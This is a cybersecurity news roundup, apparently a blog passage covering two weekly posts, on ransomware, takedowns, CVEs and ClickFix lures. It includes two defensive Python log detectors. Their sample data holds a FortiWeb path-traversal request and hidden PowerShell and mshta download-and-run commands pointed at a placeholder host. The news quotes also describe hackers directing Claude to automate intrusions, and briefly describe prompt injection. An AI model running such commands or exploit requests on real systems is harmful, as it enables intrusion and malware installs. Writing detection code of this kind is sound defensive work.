    • “These threat actors have traditionally used other ransomware gangs’ encryptors in attacks, including ALPHV/BlackCat, Qilin, RansomHub, and DragonForce, but are now creating their own operation to deploy attacks themselves and their affiliates.
    • “News of the upcoming RaaS first came to light on a Telegram channel, where threat actors calling themselves “Scattered Lapsus$ Hunters,” from the names of the three gangs forming the collective (Scattered Spider, Lapsus$, and ShinyHunters), were attempting to extort victims of data theft at Salesforce and Jaguar Land Rover (JLR).”
  • eSecurity Planet adds,
    • “A fast-moving ransomware group known as “The Gentlemen” has emerged as one of 2025’s most aggressive cybercrime operations, rapidly scaling its attacks across Windows, Linux, and ESXi environments. 
    • “First observed in July 2025, the group has already listed 48 victims on its leak site and continues to release new, highly capable ransomware variants. 
    • “Cybereason researchers said the group “… blends mature ransomware techniques with RaaS features, dual‑extortion, cross‑platform (Windows/Linux/ESXi) lockers, automated persistence, flexible propagation, and affiliate support, allowing it to scale attacks and evade basic defenses quickly.
    • “The Gentlemen ransomware group relies on tried-and-true tactics borrowed from other successful RaaS operations. Organizations can stay ahead by validating their defenses against these established methods before attackers utilize them,” said Hüseyin Can Yüceel, Security Research Lead at Picus Security.”
  • Cyber Press relates,
    • “The notorious Clop ransomware gang, also tracked as Graceful Spider, has escalated its latest extortion campaign by listing Oracle Corporation on its dark web leak site. 
    • “The group claims to have successfully breached the tech giant’s internal systems using a critical zero-day vulnerability in Oracle E-Business Suite (EBS), designated as CVE-2025-61882. 
    • “This marks a significant development in supply chain attacks, with Oracle potentially falling victim to a flaw in its own software.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • “Palo Alto Networks (PANW) is buying the observability platform Chronosphere for $3.35 billion, the latest acquisition by the cybersecurity company to capitalize on an AI-intensive economy.
    • “The Santa Clara, Calif.-based company said Wednesday the cash-and-stock deal will address demands for observability in the rapidly expanding artificial-intelligence data center market, combining Chronosphere’s observability architecture with Palo Alto Networks’ AI-powered AgentiX tool.
    • “Once we leverage AgentiX with Chronosphere, we will take observability from simple dashboards to real-time, agentic remediation,” Palo Alto Networks Chief Executive Nikesh Arora said. “We are excited to not just enter this space, but to disrupt it.”
    • “The deal is expected to close in the second half of Palo Alto Networks’ fiscal 2026.
    • “The deal came as Palo Alto Networks posted higher revenue in its latest quarter and raised its top-line view for the year.”
  • CISA announced a #SecuretheSeason campaign promoting online shopping safety.
  • Per Dark Reading,
    • “Editors from Dark Reading, Cybersecurity Dive, and TechTarget Search Security break down the depressing state of cybersecurity awareness campaigns and how organizations can overcome basic struggles with password hygiene and phishing attacks.”
  • and
    • “Securing the Win: What Cybersecurity Can Learn from the Paddock. A Formula 1 pit crew demonstrates the basic principles of how modern security teams should work.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “Congress has temporarily reauthorized a vital but recently expired cybersecurity law as part of a bill to reopen the federal government and end the longest shutdown in U.S. history.
    • “The spending legislation, which passed the House and received President Donald Trump’s signature on Wednesday [November 12, 2025] after passing the Senate on Monday [November 10, 2025], will revive the 2015 Cybersecurity Information Sharing Act through Jan. 30, 2026, giving Congress roughly two months to agree on a longer-term plan for the law.
    • “CISA 2015, as the program is known, gave companies liability protections for sharing indicators of cyber threats with federal agencies and one another. The law’s expiration on Sept. 30 has alarmed federal officials, industry executives and cyber experts who say the government may now be receiving less information about cyberattacks from businesses afraid of the legal risks.”
  • Security Week tells us,
    • “The US Department of Defense’s long-anticipated Cybersecurity Maturity Model Certification (CMMC) program officially entered its enforcement phase on November 10, 2025.
    • “Introduced as an amendment to the Defense Federal Acquisition Regulation Supplement (DFARS), the CMMC program requires defense contractors and subcontractors to implement specific cybersecurity measures to protect sensitive information. 
    • “The Department of Defense, also referred to as the Department of War, can now mandate CMMC compliance as a condition for new defense industrial base (DIB) contracts.
    • “The goal is to ensure that contractors and subcontractors can protect Federal Contract Information (FCI) and Controlled Unclassified Information (CUI). FCI is information not intended for public release that is provided to or generated by a contractor. CUI is sensitive government information that is not classified but still requires protection from unauthorized disclosures.
    • “For the past eight years, contractors have been allowed to self-attest to cybersecurity compliance, but now some organizations will also need to undergo a formal assessment by a certified third-party assessor organization (C3PAO).”
  • [On November 14, 2025,] [t]he HHS Office of Inspector General issued a report to the National Institutes of Health about necessary steps to improve the cybersecurity of the All of Us Research Program to protect participant data.
  • Bleeping Computer informs us,
    • “The U.S. Department of Justice announced [on November 14, 2025] that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.
    • “As part of this, the U.S. authorities announced actions seeking the forfeiture of $15 million in cryptocurrency from heists carried out by the APT38 threat group, which is linked to the Lazarus hacking group.
    • “The facilitators, four Americans and one Ukrainian, used their own, false, or stolen (from 18 U.S. persons) identities to make it possible for DPRK agents to be hired by American firms for remote work.
    • “The latter then funneled their salaries, as well as, in some cases, stolen data, to the North Korean government.
    • “According to the DOJ’s announcement, the actions of the five individuals affected 136 companies nationwide and generated over $2.2 million in revenue for the DPRK regime.”
  • Cybersecurity Dive points out,
    • “The U.S. and eight other Western governments have jointly dismantled the computer infrastructure behind multiple popular cybercrime tools.
    • “In a three-day operation [announced on November 14, 2025], law enforcement authorities took down more than 1,000 servers and 20 domains associated with the Rhadamanthys infostealer, the VenomRAT remote access Trojan and the Elysium botnet. Greek police arrested VenomRAT’s suspected operator.
    • “The dismantled malware infrastructure consisted of hundreds of thousands of infected computers containing several million stolen credentials,” Europol, which coordinated the operation from its headquarters in The Hague, said in a statement. “The main suspect behind the [Rhadamanthys] infostealer had access to over 100,000 crypto wallets belonging to these victims, potentially worth millions of euros.”
    • “Australia, Canada, Denmark, France, Germany, Greece, Lithuania, the Netherlands and the U.S. participated in the takedowns, which were the latest phase of Operation Endgame, an ongoing multinational effort to cripple cybercrime gangs. Cybersecurity firms, telecom companies and independent research organizations, including CrowdStrike, Lumen and Shadowserver, provided support for the operation.
    • The law enforcement disruptions targeted infrastructure that Europol said “played a key role in international cybercrime.”

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports,
    • “China’s state-sponsored hackers used artificial-intelligence technology from Anthropic to automate break-ins of major corporations and foreign governments during a September hacking campaign, the company said Thursday [November 13, 2025].
    • “The effort focused on dozens of targets and involved a level of automation that Anthropic’s cybersecurity investigators had not previously seen, according to Jacob Klein, the company’s head of threat intelligence.
    • “Hackers have been using AI for years now to conduct individual tasks such as crafting phishing emails or scanning the internet for vulnerable systems, but in this instance 80% to 90% of the attack was automated, with humans only intervening in a handful of decision points, Klein said.
    • “The hackers conducted their attacks “literally with the click of a button, and then with minimal human interaction,” Klein said. Anthropic disrupted the campaigns and blocked the hackers’ accounts, but not before as many as four intrusions were successful. In one case, the hackers directed Anthropic’s Claude AI tools to query internal databases and extract data independently.
    • “The human was only involved in a few critical chokepoints, saying, ‘Yes, continue,’ ‘Don’t continue,’ ‘Thank you for this information,’ ‘Oh, that doesn’t look right, Claude, are you sure?’ ”
    • “Stitching together hacking tasks into nearly autonomous attacks is a new step in a growing trend of automation that is giving hackers additional scale and speed.” 
  • Cybersecurity Dive adds,
    • “More than 80% of workers, including nearly 90% of security professionals, use unapproved AI tools in their jobs, according to a new report from the cyber risk monitoring vendor UpGuard.
    • “This unapproved AI use, which can introduce security vulnerabilities, is not just widespread but pervasive, with half of workers saying they use unapproved AI tools regularly and less than 20% saying they use only company-approved AI tools.
    • “Security leaders were more likely than the average employee to report using unapproved tools and far more likely to say they did so regularly, according to the report.”
  • Cybersecurity Dive adds,
    • “An advanced persistent threat actor has been targeting zero-day vulnerabilities in Cisco Identity Service Engine as well as Citrix, according to a blog post published Wednesday [November 12, 2025] by security researchers at Amazon.”
  • Per Tech Radar,
    • “Digital privacy is a growing concern these days, with millions turning to virtual private networks to shield their online activity.
    • “However, in a stark new warning, Google has confirmed that cybercriminals are exploiting this need for security by distributing malicious applications disguised as legitimate VPN services. This creates a dangerous situation where a tool meant to be a shield is, in fact, a weapon used to steal sensitive user data.
    • “The alert was issued as part of Google’s November 2025 fraud and scams advisory, which details the latest trends in online threats. Alongside warnings about AI-driven job scams and holiday-themed phishing schemes, the advisory specifically calls out the danger of fraudulent VPN apps and browser extensions.”
  • An ISACA commentator explains why more cyber tools can make you less secure.
    • “On his deathbed, the actor Edmund Kean famously said, “Dying is easy. Comedy is hard.” Here’s my version for cybersecurity professionals: Buying is easy. Operating is hard.
    • “It all comes down to the unglamorous, disciplined work of process, by which I mean configuration, testing, documentation and ownership. That’s what creates resilience. No, that work doesn’t photograph well, and it doesn’t come with a vendor logo. But it’s the difference between a security program and a shopping list.
    • “Buying a tool gives you the illusion of safety. Running it well gives you the reality. My advice? Choose reality. Everything else is marketing.”

From the ransomware front,

  • Cyberscoop reports,
    • “Federal cyber authorities shared new details Thursday about the Akira ransomware group’s techniques, the tools it uses and vulnerabilities it exploits for initial access alongside the release of a joint cybersecurity advisory.
    • “Members of the financially motivated group, which initially appeared in March 2023, are associated with other threat groups, including Storm-1567, Howling Scorpius, Punk Spider, Gold Sahara, and may have connections with the disbanded Conti ransomware group, officials said. Akira uses a double-extortion model, encrypting systems after stealing data to amplify pressure on victims.
    • “Akira ransomware has claimed more than $244 million in ransomware proceeds as of late September, the FBI and Cybersecurity and Infrastructure Security Agency said in the joint advisory. The group primarily targets small- and medium-sized businesses with many victims impacted in the manufacturing, education, IT, health care, financial and agriculture sectors.
    • “For the FBI, it is within the top five variants that we investigate,” Brett Leatherman, assistant director at the FBI Cyber Division, said during a media briefing Thursday. “It’s consequential. This group is very consequential that they fall likely within our top five.” * * *
    • “The joint advisory, which updates previous guidance around hunting for and defending against Akira, was not in response to any specific attack, said Nick Andersen, executive assistant director for cybersecurity at CISA.” 
  • and
    • “The Washington Post said it, too, was impacted by the data theft and extortion campaign targeting Oracle E-Business Suite customers, compromising human resources data on nearly 10,000 current and former employees and contractors.
    • “The company was first alerted to the attack and launched an investigation when a “bad actor” contacted the media company Sept. 29 claiming they gained access to the company’s Oracle applications, according to a data breach notification it filed in Maine Wednesday. The Washington Post later determined the attacker had access to its Oracle environment from July 10 to Aug. 22. 
    • “The newspaper is among dozens of Oracle customers targeted by the Clop ransomware group, which exploited a zero-day vulnerability affecting Oracle E-Business Suite to steal heaps of data. Other confirmed victims include Envoy Air and GlobalLogic.”
  • Bleeping Computer adds,
    • “Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.
    • “Logitech International S.A. is a Swiss multinational electronics company that sells hardware and software solutions, including computer peripherals, gaming, video collaboration, music, and smart home products.
    • “Today [November 14, 2025], Logitech filed a Form 8-K with the U.S. Securities and Exchange Commission, confirming that data was stolen in a breach.”
  • The Hacker News relates,
    • 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date.
    • 1,590 victims disclosed across 85 leak sites, showing high, sustained activity despite law-enforcement pressure.
    • 14 new ransomware brands launched this quarter, proving how quickly affiliates reconstitute after takedowns.
    • LockBit’s reappearance with version 5.0 signals potential re-centralization after months of fragmentation.
  • Security Boulevard offers zero trust insights from the Ingram Micro ransomware attack.
    • “The Ingram Micro ransomware attack serves as a potent reminder that credential theft and internal propagation can cripple even the most robust enterprises. When attackers move freely within a trusted environment, it’s not just the perimeter that’s at risk. It’s every file, every system, and every partner connected to the network. The lesson is clear: true prevention requires more than detection or containment. It demands a mindset where every file, from every source, is verified safe before it’s allowed to move between channels, endpoints, and users.”

From the cybersecurity defenses front,

  • Healthcare Dive offers tips to improve healthcare system cybersecurity.
    • “Healthcare organizations should invest in post-attack recovery and carefully evaluate risks from vendors, according to industry experts who spoke at a Healthcare Dive virtual event.”
  • Cyberscoop reports,
    • “The phishing kit Lighthouse, which has aided text scams like those soliciting victims to pay unpaid road tolls, appears to have been hampered shortly after Google filed a lawsuit aimed at its creators.
    • “Google said on Thursday [November 13, 2025] that Lighthouse had been shut down. Two other organizations that have tracked the suspected Chinese operators of Lighthouse said they saw signs it had at least been disrupted.
    • “This shutdown of Lighthouse’s operations is a win for everyone,” said Halimah DeLaine Prado, general counsel at Google. “We will continue to hold malicious scammers accountable and protect consumers.”
    • “Google filed its lawsuit in the U.S. District Court for the Southern District of New York. They allege that 25 unnamed individuals behind Lighthouse have violated racketeering, trademark and anti-hacking laws with their prolific SMS phishing, or “smishing,” platform.”
  • Bleeping Computer lets us know,
    • “Fortinet has confirmed that it has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now “massively exploited in the wild.”
    • “The flaw was silently patched after reports that unauthenticated attackers were exploiting an unknown FortiWeb path traversal flaw in early October to create new administrative users on Internet-exposed devices.
    • “The attacks were first identified by threat intel firm Defused on October 6, which published a proof-of-concept exploit and reported that an “unknown Fortinet exploit (possibly a CVE-2022-40684 variant)” is being used to send HTTP POST requests to the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi Fortinet endpoint to create local admin-level accounts.”
  • Cybersecurity Dive informs us,
    • “Businesses face a range of problems with their threat intelligence platforms, including difficulty assessing the accuracy of alerts and problems integrating the platforms with their existing tools, according to a report that Recorded Future published on Wednesday.
    • “The report, which assessed the state of threat intelligence in enterprises, found that 83% of companies have dedicated threat intelligence teams, a slight uptick from last year.
    • “Roughly half of companies (48%) pay for more than one threat intelligence service, while 41% pay for only one.”
  • Dark Reading relates,
    • “New survey data indicates that organizations are pushing hard for passwordless authentication.
    • “A significant chunk of online account passwords in 2025 remain basic and easy to crack — a fact that will surprise few. But last month, Dark Reading asked readers how their organizations are handling password security these days. The results were, perhaps surprisingly, optimistic.
    • “As we enter the second quarter of the 21st century, rather than applying new Band-Aids to the problem, organizations finally appear to be moving toward a future with few to no passwords at all.”
  • Dark Reading offers insights into Apple / Mac security tools.
  • Here’s a link to Dark Reading’s CISO Corner.
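The FortiWeb item above quotes the request shape that was used: a `%3f` (an encoded `?`) followed by `../` segments that walk out of the REST API namespace into `cgi-bin`. The following is an added detection example, not code from Bleeping Computer, Defused or Fortinet: it scans constructed access-log lines, percent-decodes the path until stable, normalizes it, and flags requests that start under `/api/` but resolve outside it. The log lines, addresses and the `/api/` namespace prefix are constructed assumptions.

```python
"""Flag percent-encoded path traversal in web server access logs.

Added detection example built around the request shape quoted above;
the sample log lines below are constructed and use documentation IP ranges.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed common-log-format lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [06/Oct/2025:10:01:02 +0000] "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 512
203.0.113.11 - - [06/Oct/2025:10:01:05 +0000] "GET /api/v2.0/cmdb/system/admin?vdom=root HTTP/1.1" 200 2048
203.0.113.12 - - [06/Oct/2025:10:01:09 +0000] "POST /api/v2.0/cmdb/system/admin%253f/../../../../../cgi-bin/fwbcgi HTTP/1.1" 200 512
203.0.113.13 - - [06/Oct/2025:10:01:12 +0000] "GET /api/v2.0/cmdb/system/status HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(s, rounds=3):
    """Percent-decode until stable (bounded), so double encoding such as
    %253f -> %3f -> ? is unwrapped before the path is examined."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def resolve(target):
    """Return (decoded_path, normalized_path) for a request target.

    The query string is split off on the RAW '?' first. Decoding before
    splitting would let an encoded %3f act as the query delimiter, leaving a
    harmless-looking '/api/v2.0/cmdb/system/admin' path (see naive_path)."""
    raw_path = target.split("?", 1)[0]
    decoded = decode_fully(raw_path)
    return decoded, posixpath.normpath(decoded)


def naive_path(target):
    """The mistake the detector avoids: decode first, then split on '?'."""
    return decode_fully(target).split("?", 1)[0]


def escapes_namespace(decoded, normalized, namespace="/api/"):
    """True when dot-dot segments carry a request that started under
    `namespace` to a location outside it (the traversal actually took effect)."""
    has_dotdot = ".." in decoded.split("/")
    return has_dotdot and decoded.startswith(namespace) and not normalized.startswith(namespace)


def scan(log_text):
    """Return one hit per log line whose path traverses out of the API namespace."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        decoded, normalized = resolve(m["target"])
        if escapes_namespace(decoded, normalized):
            hits.append({
                "src": m["src"],
                "method": m["method"],
                "resolved": normalized,
                "status": m["status"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["src"]} {hit["method"]} -> {hit["resolved"]} (HTTP {hit["status"]})')
```

A 200 on a traversal hit is the line to escalate: it means the device answered the `cgi-bin` request rather than rejecting it.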

Cybersecurity Dive

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports,
    • “Congressional leaders are pressing federal agencies to provide more information on their plans to compete with China on a range of tech and cybersecurity issues, including a strategy for promoting American 6G telecommunications infrastructure and limiting Chinese tech in US supply chains.
    • “Representative Raja Krishnamoorthi, D-Ill., ranking member on the House Select Committee on the Chinese Communist Party, wrote to Secretary of State Marco Rubio last week asking for an update on the department’s work building international coalitions around 6G.
    • “In the letter, dated Oct. 30 and shared exclusively with CyberScoop, he called for the department to share details on how it is fighting to shape international norms, global technical standards and supply chains in favor of U.S. and non-Chinese companies and technologies, saying “diplomacy can, and must, play a key role in this strategy.”
    • “While it remains essential that we continue to address the threats posed by the Chinese Communist Party’s efforts to dominate 5G, we must also look forward to how we can outcompete the CCP in the next frontier of wireless competition,” he wrote.”
  • HIPAA Journal tells us,
    • “Two U.S. nationals have recently been indicted for using BlackCat ransomware to attack targets in the United States. A third individual is suspected of involvement but was not included in the indictment. All three individuals worked at cybersecurity companies and conducted the attacks while they were employed there.
    • “Ryan Clifford Goldberg was employed by the cybersecurity firm Sygnia as an incident response professional, and Kevin Tyler Martin and an unnamed co-conspirator were both employed by the Chicago-based cyber threat intelligence and incident response firm DigitalMint as ransomware threat negotiators.
    • “The two indicted individuals are alleged to have engaged in a conspiracy to enrich themselves by breaching company networks, stealing their data, using ransomware to encrypt files, and extorting the companies to obtain cryptocurrency payments. A medical device company was attacked on or around May 13, 2023, resulting in a $10 million ransom demand. The medical device company negotiated and paid a $1,274,000 ransom payment.
    • “A pharmaceutical company was also attacked in May 2023, but the ransom demand was not disclosed. Then came a July 2023 attack on a doctor’s office in California, which included a $5,000,000 ransom demand. In October 2023, an engineering company was attacked and told to pay $1 million, then in November 2023, a drone manufacturer in Virginia was attacked, and the defendants allegedly demanded a $300,000 ransom payment. Only the medical device company paid the ransom.”
  • Cyberscoop adds,
    • “A 25-year-old Russian national pleaded guilty to multiple charges stemming from their participation in ransomware attacks and faces a maximum penalty of up to 53 years in prison.
    • “Aleksei Olegovich Volkov, also known as “chubaka.kor,” served as the initial access broker for the Yanluowang ransomware group while living in Russia from July 2021 through November 2022, according to court records. Prosecutors accuse Volkov and unnamed co-conspirators of attacking seven U.S. businesses during that period, including two that paid a combined $1.5 million in ransoms. 
    • “The victims, which included an engineering firm and a bank, said executives received harassing phone calls and their networks were hit with distributed denial of service attacks after their data was stolen and encrypted by Yanluowang ransomware operators.”

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “A federal agency that supplies budget and economic information to Congress has suffered a cybersecurity incident, reportedly at the hands of a suspected foreign party.
    • “A spokesperson for the Congressional Budget Office (CBO) acknowledged the incident Thursday [November 6] after The Washington Post reported that the office was hacked, with the attackers potentially accessing communications between lawmakers and researchers at the agency.
    • “The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency’s systems going forward,” said the CBO spokesperson, Caitlin Emma.” 
  • and
    • “SonicWall said a state-sponsored threat actor was behind the brute-force attack that exposed firewall configuration files of every customer that used the company’s cloud backup service. 
    • The vendor pinned the responsibility for the attack on an undisclosed nation state Tuesday, after Mandiant concluded its investigation into the incident.
    • “SonicWall did not attribute the attack to a specific country or threat group and Mandiant declined to provide additional information. The vendor’s update, which lacked a root-cause analysis, was mostly an effort to put the attack behind it as leadership made pledges to improve SonicWall’s security practices.”
  • The Cybersecurity and Infrastructure Security Agency added two known exploited vulnerabilities to its catalog this week.
    • November 4, 2025
      • CVE-2025-11371 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
      • CVE-2025-48703 CWP Control Web Panel OS Command Injection Vulnerability 
        • The Hacker News discusses these KEVs here.
  • Cybersecurity Dive informs us,
    • “Critical flaws in Microsoft Teams can be used to allow an attacker to manipulate messages, spoof notifications and even impersonate executives, according to a report released Tuesday by Check Point Research. 
    • “Researchers found four vulnerabilities that allow attackers, including external hackers and malicious insiders, to manipulate Teams messages, conduct business email compromise or forge identities in video calls or phone messages.
    • “Researchers found that attackers could conduct four specific types of attacks:
      • “Attackers could edit Teams messages without leaving the “edited” label behind in the message.
      • “Message notifications could be manipulated so that they appeared to be from another sender. 
      • “Attackers could change the display name inside private chats.
      • “Caller identities could be altered in video and audio calls.” 
  • and
    • “A critical vulnerability in Cisco IOS XE is being exploited to install an implant called BadCandy in a renewed wave of attacks, according to warnings from Australian government authorities and multiple security researchers. 
    • “State-linked and criminal hackers have been abusing the vulnerability, tracked as CVE-2023-20198, to install BadCandy in targeted systems since 2023, and have periodically renewed those attacks in waves.” * * *
    • “Shadowserver Foundation on Monday warned that threat activity is widespread across the globe, with more than 15,000 devices with backdoor implants remaining visible.”
    • “The vulnerability, tracked as CVE-2023-20198, abuses the web user interface in Cisco IOS XE software and has a severity score of 10. It was previously disclosed as a zero-day in 2023, with more than 42,000 devices exploited.” 
  • Security Week lets us know,
    • “ClickFix attacks continue to evolve and the technique appears to be increasingly used against macOS users, with lures becoming ever more convincing. 
    • ClickFix has been widely adopted by both profit-driven cybercriminals and state-sponsored threat groups.
    • “The social engineering tactic enables attackers to trick victims into inadvertently executing malicious commands, particularly ones that lead to the deployment of malware.
    • “An attack involves a fake error message being displayed, informing the targeted user that in order to ‘fix’ the issue they need to click on a button and execute a series of operations. 
    • “When the user clicks the ‘fix’ or ‘verify’ button in the prompt, a malicious command is copied in the background to their clipboard. 
    • “On Windows, the victim is then instructed to press the Windows+R keys, which opens the Windows Run dialog box, then press Ctrl+V, which pastes the malicious command from the clipboard into the box, and finally press Enter to execute the command. The command typically runs silently in the background (often by leveraging a legitimate Windows utility such as PowerShell), downloading and installing a piece of malware.”
  • Per Cybersecurity Dive,
    • “Energy, healthcare, government and transportation saw the biggest surges in cyberattacks targeting Android devices between June 2024 and May 2025, the security firm Zscaler said in a report published on Wednesday.
    • “Agriculture, IT and education saw some of the biggest drops in attacks on Android devices, according to the report.
    • “Manufacturing, which also saw a significant increase in 2025, accounted for 26% of all cyberattacks on Android devices that Zscaler tracked.”
  • and
    • “Identity-related risks are the biggest danger facing enterprises’ cloud environments, according to a report that ReliaQuest published on Tuesday.
    • “Forty-four percent of valid alerts from cloud security tools “were rooted in identity-related weaknesses,” ReliaQuest said, while 33% of all alerts related to identity.
    • “Hackers prefer identity-based attacks because they rely on credentials available for cheap on the dark web, they can evade many detection tools and there are so many identities ripe for impersonation, according to the report.”
  • and
    • “Cyber threat actors have recently begun using AI to develop malware, in a dramatic evolution of the technology’s role in the hacking ecosystem, Google said on Wednesday.
    • “New strains of malware use AI to grow and change in real time during the attack phase, potentially making detection and defense much more difficult, Google’s threat intelligence researchers said in a report.
    • “The recent trend represents the latest phase in an AI arms race between attackers and defenders.”
  • Help Net Security adds,
    • Security leaders are staring down a year of major change. In its Cybersecurity Forecast 2026, Google paints a picture of a threat landscape transformed by AI, supercharged cybercrime, and increasingly aggressive nation-state operations. Attackers are moving faster, scaling their operations with automation.
    • “By 2026, AI will be a normal part of everyday attack and defense activity. Adversaries are already using it to automate phishing, clone voices, and shape disinformation.
    • “One of the fastest-growing threats is prompt injection, which manipulates AI systems to ignore safeguards and carry out hidden commands. As more companies deploy LLMs inside business processes, these attacks are becoming easier to launch and harder to detect.” * * *
    • “The report notes a growing reliance on AI agents, systems that act on their own to complete tasks. These agents will need distinct digital identities and strict access controls. Security programs built for human users will not be enough. Identity management will have to account for AI-driven decision making and temporary task-based privileges.
    • “AI is also reshaping security operations. Analysts will soon direct AI tools rather than manually sort through alerts. Instead of reviewing logs, they will examine case summaries and confirm automated containment steps. This shift enables faster response but also brings new oversight challenges.”
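The Security Week item above walks through the Windows ClickFix flow: a command pasted into the Run dialog launches a script host that silently downloads and runs a payload. The following is an added detection example, not code from Security Week or the original post: it scores constructed Sysmon-style process-creation events for the combination that flow produces (explorer.exe as the parent, a script interpreter as the child, and hidden-window, download and execute indicators on the command line). The events, field names (`Image`, `ParentImage`, `CommandLine`, `UtcTime`), the `constructed.invalid` host and the scoring threshold are constructed assumptions.

```python
"""Score process-creation events for the Run-dialog ClickFix pattern.

Added detection example; the events below are constructed, Sysmon-style
(Event ID 1-like) records, not real telemetry.
"""
import ntpath
import re

# Constructed sample events (not real telemetry). The 'constructed.invalid'
# host is a placeholder that never resolves.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-11-03 14:02:11",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://constructed.invalid/a | iex"'},
    {"UtcTime": "2025-11-03 14:05:40",  # ordinary interactive use from Run
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile Get-Date"},
    {"UtcTime": "2025-11-03 14:09:03",  # remote script host fed a URL
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://constructed.invalid/p.hta"},
    {"UtcTime": "2025-11-03 14:12:27",  # same command, but not from the Run dialog
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://constructed.invalid/b | iex"'},
    {"UtcTime": "2025-11-03 14:15:00",  # not a script host
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# Processes started from the Win+R Run dialog are children of explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "certutil.exe", "curl.exe"}
# Hosts that will fetch and run remote content given only a URL.
REMOTE_LOADERS = {"mshta.exe", "certutil.exe", "curl.exe"}

# Each indicator is one category; a hit counts once regardless of repeats.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b|https?://", re.I),
    "execute": re.compile(r"\b(?:iex|invoke-expression|start-process)\b", re.I),
    "encoded": re.compile(r"-e(?:nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def score_event(event):
    """Return (score, reasons) for one event under the Run-dialog rule.

    Score is 0 when the parent/child pair does not match the ClickFix flow;
    other rules (not shown) cover script hosts spawned by services or Office."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    if parent not in RUN_DIALOG_PARENTS or image not in INTERPRETERS:
        return 0, []
    cmd = event.get("CommandLine", "")
    reasons = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if image in REMOTE_LOADERS and "download" in reasons:
        reasons.append("remote_loader")  # URL handed to a loader is itself a fetch+run
    return len(reasons), reasons


def scan(events, threshold=2):
    """Return events whose score reaches `threshold`, oldest first."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"UtcTime": event["UtcTime"], "Image": basename(event["Image"]),
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f'{hit["UtcTime"]} {hit["Image"]} score={hit["score"]} {hit["reasons"]}')
```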

From the ransomware front,

  • Cybersecurity Dive reports,
    • “An August ransomware attack against the state of Nevada has been traced to a May intrusion, when a state employee mistakenly downloaded a malware-laced tool from a spoofed website, according to a forensic report the state released Wednesday.
    • “State officials refused to submit to a ransom demand and recovered 90% of the impacted data after a 28-day recovery period. The state had insurance coverage and pre-negotiated vendor agreements, which factored into the decision not to pay a ransom. 
    • “The threat actor deployed an attack aimed at taking state systems offline and left behind a note with instructions on how to recover the encrypted systems and data, in an attempt to extort the state,” Timothy Galluzzi, chief information officer and executive director of the Governor’s Technology Office, said in the report.” * * *
    • “The threat actor, whom the report did not identify, gained access to more than 26,400 files. Another 3,200 files were left exposed across multiple systems. The state incurred about $1.3 million in expenses related to recovery costs, as they engaged several major companies to help investigate and restore agency services, including Mandiant, Dell, Microsoft DART, Palo Alto Networks, Aeris and other firms.” 
  • TechCrunch informs us,
    • “The Washington Post has said that it was one of the victims of a hacking campaign tied to Oracle’s suite of corporate software apps.
    • “Reuters first reported the news on Friday [November 7], citing a statement from the newspaper that said it was affected “by the breach of the Oracle E-Business Suite platform.” 
    • “A spokesperson for the Post did not immediately respond to TechCrunch’s request for comment.” * * *
    • “On Thursday [November 6], Clop claimed on its website that it had hacked The Washington Post, claiming that the company “ignored their security,” language that the Clop gang typically uses when the victim does not pay the hackers. 
